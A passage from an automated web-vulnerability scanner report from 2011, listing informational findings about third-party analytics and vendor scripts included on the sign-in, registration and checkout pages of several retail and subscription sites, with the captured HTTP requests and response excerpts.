<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>


   <script language="javascript" src="https://www.ftdimg.com/v20110407/js/compressed.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="https://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...
<!-- Start Pixel code for netmining_pixel -->
<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- printing out our omniture js file shared by both dev and production -->
<script language="JavaScript" src="https://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.7. https://ordering.ftd.com/reminder-signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /reminder-signin/

Issue detail

The response dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below):

https://www.ftdimg.com/v20110407/js/compressed.js
https://www.ftdimg.com/js/tealeaf.js
https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js
https://ftd.netmng.com/?aid=181
https://www.ftdimg.com/js/omniture.js

Request

GET /reminder-signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/new-signup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:39:19 GMT
Server: Apache
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:39:20 GMT
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 98257


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>


   <script language="javascript" src="https://www.ftdimg.com/v20110407/js/compressed.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="https://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...
<!-- Start Pixel code for netmining_pixel -->
<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- printing out our omniture js file shared by both dev and production -->
<script language="JavaScript" src="https://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.8. https://ordering.ftd.com/signin/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ordering.ftd.com
Path:   /signin/

Issue detail

The response dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below):

https://www.ftdimg.com/v20110407/js/compressed.js
https://www.ftdimg.com/js/tealeaf.js
https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js
https://ftd.netmng.com/?aid=181
https://www.ftdimg.com/js/omniture.js

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:09:59 GMT
Server: Apache
Set-Cookie: track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 02:09:59 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 113972


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>


   <script language="javascript" src="https://www.ftdimg.com/v20110407/js/compressed.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="https://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="https://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...
<!-- Start Pixel code for netmining_pixel -->
<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- printing out our omniture js file shared by both dev and production -->
<script language="JavaScript" src="https://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...

18.9. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.homedepot.ca
Path:   /webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The response dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below; the second source is protocol-relative and resolves to https on this page):

https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js
//www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1

Request

GET /webapp/wcs/stores/servlet/UserRegistrationForm?langId=-15&storeId=10051&catalogId=10051&new=Y HTTP/1.1
Host: secure.homedepot.ca
Connection: keep-alive
Referer: http://www.homedepot.ca/webapp/wcs/stores/servlet/Home?storeId=10051&catalogId=10051&langId=-15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=135472616.1305510002.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RES_TRACKINGID=989860238041728; hd_search_cookie=1; localRegion=446%2C7080%2CToronto%2C43.6687%2C-79.3382; s_vi=[CS]v1|26E840400507A189-40000102A0090C5F[CE]; __utma=135472616.1475317367.1305510002.1305510002.1305510002.1; __utmc=135472616; __utmb=135472616.2.10.1305510002; RES_SESSIONID=223896591225639; ResonanceSegment=1; s_cc=true; fsr.s={"v":1,"rid":"1305510029454_909320","to":5,"c":"http://www.homedepot.ca/webapp/wcs/stores/servlet/Home","pv":2,"lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305510812715}; s_v14=English; s_sq=homedepotca%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttps%25253A%25252F%25252Fsecure.homedepot.ca%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FUserRegistrationForm%25253FlangId%25253D-15%252526storeId%25253D10051%252526%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 16 May 2011 02:10:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
Set-Cookie: JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
Cache-Control: no-store, no-cache
Expires: 0
Pragma: no-cache
Content-Length: 75346


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
<!--
       By use of this code snippet, I agree to the Brightcove Publisher T and C found at https://accounts.brightcove.com/en/terms-and-conditions/.
       -->
       
       <script language="JavaScript" type="text/javascript" src="https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
</script>
       
               
       <script src="//www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1"></script>
...[SNIP]...

18.10. https://secure.orientaltrading.com/ui/userProfile/processRequest.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.orientaltrading.com
Path:   /ui/userProfile/processRequest.do

Issue detail

The response dynamically includes the following script from another domain (the tag is visible in the response excerpt below):

https://www.googleadservices.com/pagead/conversion.js

Request

GET /ui/userProfile/processRequest.do?requestURI=displayLogin HTTP/1.1
Host: secure.orientaltrading.com
Connection: keep-alive
Referer: http://www.orientaltrading.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; mt.v=1.322159034.1305510206640; fsr.s={"v":1,"rid":"1305510222528_763877","pv":2,"to":5,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"f":1305510848788}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 85683


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


       
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.11. http://shop.pacsun.com/home.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.pacsun.com
Path:   /home.jsp

Issue detail

The response dynamically includes the following script from another domain (the tag is visible in the response excerpt below):

https://server.iad.liveperson.net/hc/LPpacificsunwear/x.js?cmd=file&file=chatScript3&site=LPpacificsunwear&category=en;liveperson;1

Request

GET /home.jsp HTTP/1.1
Host: shop.pacsun.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4A5CD2AB14DCF8A7583336761C49C5F9; PIPELINE_SESSION_ID=f678eccdc0a8116800f19d6e8f776319; stop_mobi=yes; Country=US; Currency=USD; mbox=check#true#1305510282|session#1305510221453-787352#1305512082; s_cc=true; s_cm=1; c_m=undefinedDirect%20LoadDirect%20Load; gpv_page=Homepage; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26E840AA05079E9A-40000102200D711E[CE]; PAC1=3UciAD7hGgyn3DR7vSGHZXyKZ8RuiTjrhEFlsVI3oASM_lTAjjEvuug; fsr.s={"v":1,"rid":"1305510268752_67363","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Cache-Control: max-age=1
Date: Mon, 16 May 2011 01:58:43 GMT
Connection: close
Content-Length: 124098


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html
...[SNIP]...
</div>
<script language='javascript' type='text/javascript' src='https://server.iad.liveperson.net/hc/LPpacificsunwear/x.js?cmd=file&amp;file=chatScript3&amp;site=LPpacificsunwear&amp;category=en;liveperson;1'>
</script>
...[SNIP]...

18.12. http://subscriptions.marvel.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below; the second source is protocol-relative and resolves to http on this page):

http://www.google-analytics.com/urchin.js
//secure-us.imrworldwide.com/v53.js

Request

GET / HTTP/1.1
Host: subscriptions.marvel.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmb=125179656; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:30 GMT
Server: Apache
X-server-addr: 192.168.100.57
X-trying: 192.168.100.202
X-mysql: 192.168.100.202
Vary: Accept-Encoding
X-ServerNickName: Venom
Content-Type: text/html; charset=utf-8
Content-Length: 57886

<html>
<head>
<title>Marvel Subscriptions - Home</title>
<link rel="stylesheet" href="http://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="screen">

...[SNIP]...
<!-- google -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

18.13. http://subscriptions.marvel.com/checkout/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /checkout/

Issue detail

The response (a 302 redirect that still carries a full HTML body) dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below):

http://www.google-analytics.com/urchin.js
//secure-us.imrworldwide.com/v53.js

Request

GET /checkout/ HTTP/1.1
Host: subscriptions.marvel.com
Proxy-Connection: keep-alive
Referer: http://subscriptions.marvel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 10:36:20 GMT
Server: Apache
X-server-addr: 192.168.100.222
X-trying: 192.168.100.2
X-mysql: 192.168.100.2
Location: https://subscriptions.marvel.com/checkout/
Set-Cookie: split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm; expires=Mon, 16-May-2011 12:36:20 GMT; path=/
Vary: Accept-Encoding
X-ServerNickName: Cap
Content-Type: text/html; charset=utf-8
Content-Length: 27160

<html>
<head>
<title>Marvel Subscriptions - Checkout</title>
<link rel="stylesheet" href="http://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="screen
...[SNIP]...
<!-- google -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

18.14. https://subscriptions.marvel.com/checkout/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriptions.marvel.com
Path:   /checkout/

Issue detail

The response dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below; the second source is protocol-relative and resolves to https on this page):

https://ssl.google-analytics.com/urchin.js
//secure-us.imrworldwide.com/v53.js

Request

GET /checkout/ HTTP/1.1
Host: subscriptions.marvel.com
Connection: keep-alive
Referer: http://subscriptions.marvel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=luue98b2qr99ivbgtvj7dm65i7; __utma=125179656.1793272522.1305510243.1305510243.1305510243.1; __utmc=125179656; __utmz=125179656.1305510243.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); split_nav_split=%2Fvar%2Fwww%2Fcom.marvel%2Fcom.marvel.frontend%2Fsites%2Fsubscriptions%2Fwww%2Fv3%2Ftemplates%2Fsub_nav.tmpl.htm

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:22 GMT
Server: Apache
X-server-addr: 192.168.100.7
X-trying: 192.168.100.114
X-mysql: 192.168.100.114
Vary: Accept-Encoding
X-ServerNickName: Mj
Keep-Alive: timeout=8, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 27219

<html>
<head>
<title>Marvel Subscriptions - Checkout</title>
<link rel="stylesheet" href="https://i.annihil.us/u/prod/sub/i/content/outcss/1292508188-v3-i-css-subs.css" type="text/css" media="scree
...[SNIP]...
<!-- google -->

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

18.15. http://www.acehardware.com/category/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below):

http://ACE.imageg.net/js/gomez-gtagb4_noobj.js
http://ACE.imageg.net/include/flashobject.js
http://ACE.imageg.net/include/swfobject.js
http://ACE.imageg.net/js/DF_main.js
http://ACE.imageg.net/js/WIZ_topNav.js
http://ACE.imageg.net/include/infozone.js
http://ACE.imageg.net/pwr/engine/js/full.js
http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js
http://ACE.imageg.net/include/minicart.js
http://ACE.imageg.net/js/WIZ_box.js
http://ACE.imageg.net/js/WIZ_ToolTip.js
http://ACE.imageg.net/include/tabset_dept.js
http://ACE.imageg.net/include/tabset.js
https://dsa.csdata1.com/data/js/9027093/csgather.js
http://media.gsimedia.net/tg/gsiutt/store133.js

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:20 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:01:27 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115602

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
</SCRIPT>
   <SCRIPT LANGUAGE="JavaScript" type="text/javascript" src="http://ACE.imageg.net/js/gomez-gtagb4_noobj.js"></SCRIPT>
...[SNIP]...
<!--SEO Changes for PMO# 437313 End-->

   <script type="text/javascript" src="http://ACE.imageg.net/include/flashobject.js"></script>
<script type="text/javascript" src="http://ACE.imageg.net/include/swfobject.js"></script>

   <script type="text/javascript" src="http://ACE.imageg.net/js/DF_main.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_topNav.js"></script>
   <script type="text/javascript" src="http://ACE.imageg.net/include/infozone.js"></script>
...[SNIP]...
<div id="siteBg">

       
                           <script type="text/javascript" src="http://ACE.imageg.net/pwr/engine/js/full.js"></script>
...[SNIP]...
<!-- Start Email Signup -->
<script type="text/javascript" src="http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js"></script>
...[SNIP]...
<!-- begin additions for minicart -->
<script type="text/javascript" src="http://ACE.imageg.net/include/minicart.js"></script>
...[SNIP]...
</div>


                   <script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_box.js"></script>
<link href="http://ACE.imageg.net/css/WIZ_ACE_box.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="http://ACE.imageg.net/js/WIZ_ToolTip.js"></script>
...[SNIP]...
</script>
               
               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset_dept.js"></script>
               
               <script type="text/javascript" src="http://ACE.imageg.net/include/tabset.js"></script>
...[SNIP]...
</script>
<script language='javascript' src='https://dsa.csdata1.com/data/js/9027093/csgather.js'></script>
...[SNIP]...
<!--You are running on ashprd2_ws_47_5-->


<script src="http://media.gsimedia.net/tg/gsiutt/store133.js"></script>
...[SNIP]...

18.16. http://www.acehardware.com/home/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains (the tags are visible in the response excerpt below; gomez-gtagb4_noobj.js is included twice):

http://ACE.imageg.net/js/gomez-gtagb4_noobj.js
http://ACE.imageg.net/include/flashobject.js
http://ACE.imageg.net/include/swfobject.js
http://ACE.imageg.net/js/DF_main.js
http://ACE.imageg.net/js/WIZ_topNav.js
http://ACE.imageg.net/include/infozone.js
http://ACE.imageg.net/js/WIZ_TempTizzy.js
http://ACE.imageg.net/pwr/engine/js/full.js
http://ACE.imageg.net/js/PG_ACE_emailSignupToggle.js
http://ACE.imageg.net/include/minicart.js
http://ACE.imageg.net/include/tabset_home.js
http://ACE.imageg.net/include/tabset.js
https://dsa.csdata1.com/data/js/9027093/csgather.js
http://media.gsimedia.net/tg/gsiutt/store133.js

Request

GET /home/index.jsp HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
